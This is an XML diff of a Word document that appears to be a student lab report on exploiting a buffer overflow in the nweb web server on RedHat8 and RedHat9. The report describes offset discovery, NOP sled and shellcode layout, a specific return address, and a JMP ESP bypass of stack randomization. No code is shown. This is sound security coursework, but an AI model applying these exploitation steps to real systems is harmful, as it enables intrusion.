+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> when in Python3 I pass my string as a byte literal it adds “b/” to the starting of the output. This creates 2 extra bytes when sending the exploit, therefore, we subtract it. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -745,7 +1643,23 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">In the overflow string, first 785 bytes are NOP sleds followed by </w:t>
+        <w:t xml:space="preserve">In the overflow string, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>first</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 785 bytes are NOP sleds followed by </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -761,21 +1675,53 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> which is your shell code and then some more NOP sleds and then lastly the redirection address but backwards</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(cause Little Endian)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Then because you cannot start your string with a NOP sled(it corrupted my input), you create another string, </w:t>
+        <w:t xml:space="preserve"> which is your shell code and then some more NOP sleds and then lastly the redirection address but </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>backwards</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>cause Little Endian)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Then because you cannot start your string with a NOP </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sled(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">it corrupted my input), you create another string, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -831,7 +1777,23 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> till it reaches your shell code. And then you have to fill all the other memory addresses with something(padding) to reach the EIP which you fill with the EIP address since RedHat8 does not randomize the ESP location. </w:t>
+        <w:t xml:space="preserve"> till it reaches your shell code. And then you </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>have to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fill all the other memory addresses with something(padding) to reach the EIP which you fill with the EIP address since RedHat8 does not randomize the ESP location. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1339,24 +2301,661 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
+        <w:t xml:space="preserve">So, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lets</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> break down the structure of the input above. Firstly, we pass 1020 As, these are important as they will help us overflow and reach the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>eip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Our EIP is at </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>a distance of 1032</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, so the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which starts with “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>helloworld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">” adds 10 bytes and the “b/” from using byte literals in python3 account for the remaining 12 bytes, thus, bringing us to 1032 bytes. Now, when we reach this distance, that is where the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">input starts overflowing into the EIP. Now, as RedHat9 randomizes the ESP address, we cannot just put a static </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>address(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">its still a static address, just not whatever the ESP address will be). We load the ESP with a JMP ESP instruction, this instruction basically tells your EIP to jump to wherever the ESP is located. After that, we fill our stack with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">So, lets break down the structure of the input above. Firstly, we pass 1020 As, these are important as they will help us overflow and reach the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>eip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Our EIP is at a distance of 1032, so the </w:t>
+        <w:t xml:space="preserve">some padding of NOP sleds again and put our shell code in the middle and then put some more NOP sleds. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Determining the Parameters used in the Malicious Input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>RedHat8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Firstly, to figure out the buffer length we just keep feeding the program more and more data or you could create an absurdly large pattern using “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>pattern_create</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>” in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> framework. I used a pattern of size 3000 and sent it to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server through </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ncat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This created a core dump on our recreation of the environment which told us that there was a segmentation fault with signal 11. Using the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>pattern_offset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, we figured out </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">that the saved EIP starts at </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>a distance of 1032</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>. Now, to figure out the architecture, I filled a string with 1032 “</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>A”s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and the last 4 bytes with “BCDE”. Upon inspecting the core dump file, the saved EIP was overflowed with “0x45444342”. This step helps us understand that we are working with a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Little Endian</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Architecture and that we have control over what can be written over the EIP. The next part was to figure out what can be a suitable address to overwrite our EIP to and fill those addresses with our shell code. To figure out a suitable memory location we </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">use the command “x/64 $esp-0x__” and then try to work our way upwards to at least 205 bytes, cause that’s how long the shell code is. I worked my way up 0x33F where the memory was filled with As. The memory address I determined to redirect the flow of the code was “0xbffff7c1”. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>RedHat9:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now, since the attack is being conducted on the same program, however, it is running a newer operating system with stack randomization, the only parameter that changes for us, is to figure out what addresses we could fill up and what addresses we could reach. Now, since the ESP is basically different </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>everytime</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>, we could either brute force for ages or use something called a JMP ESP instruction. Essentially, a JMP ESP instruction is an instruction which tells the operating system to go to wherever the ESP is located. Now, it does not matter if we know where the ESP is, the operating system will literally hold our hand and take us to where ESP is hiding. There are multiple tools that can help us locate where the ESP</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>, one</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of which I came across in my research is called Mona. However, we were given a program that searches where a JMP ESP is located. Now, once you figure out the address where the JMP ESP is located</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, you basically know what you will be filling up in your EIP. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Generating Malicious Input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>RedHat8:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">The language I used to generate and test my exploit was python for a week which frustrated me and then I switched to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>C(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">attached the half developed exploit) for a brief evening before going back to my work in python. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>After figuring out the memory address, where it would be suitable and could fit the entirety of the exploit, you try to reach that address by trying to fill it with characters you can recognize. The input that I sent over after knowing the above information was to create a pattern where I send 827 As, these would represent the NOP sleds, then 205 Fs which would represent the shell code and then 4 Bs, which would be the address to where the redirection of the program would go. Now, in practice those parameters should have worked</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> however</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, during testing I figured out that it is easier to create a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>pad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> before the shell program and after the shell program. Now this process </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">took </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>some time</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as when you filled </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>up</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the stack with characters, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>behaviour</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> wouldn’t change. However, when you replace characters with shell code and NOP sleds, you understand if your code runs or not. Essentially, there should be a better way to figure out how to create a perfect padding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>. However</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, I did it using a </w:t>
+      </w:r>
